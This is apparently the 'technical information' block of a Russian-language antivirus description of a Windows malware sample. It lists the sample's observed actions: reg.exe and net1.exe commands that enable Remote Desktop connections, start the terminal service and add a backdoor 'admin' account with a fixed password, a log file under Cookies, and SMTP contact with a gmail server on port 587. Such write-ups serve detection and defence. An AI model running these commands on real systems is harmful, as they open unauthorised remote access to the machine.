Техническая информация
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x0 /f
- <SYSTEM32>\net1.exe start Termservice
- <SYSTEM32>\reg.exe add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
- <SYSTEM32>\net1.exe user /add admin qwertyu@1234
- <SYSTEM32>\net1.exe localgroup %USERNAME%s admin /add
- %HOMEPATH%\Cookies\win32log0.ini
- <Полный путь к вирусу>
- 'sm##.gmail.com':587
- DNS ASK sm##.gmail.com
- ClassName: '' WindowName: 'Windows Task Manager'
- ClassName: 'Shell_TrayWnd' WindowName: ''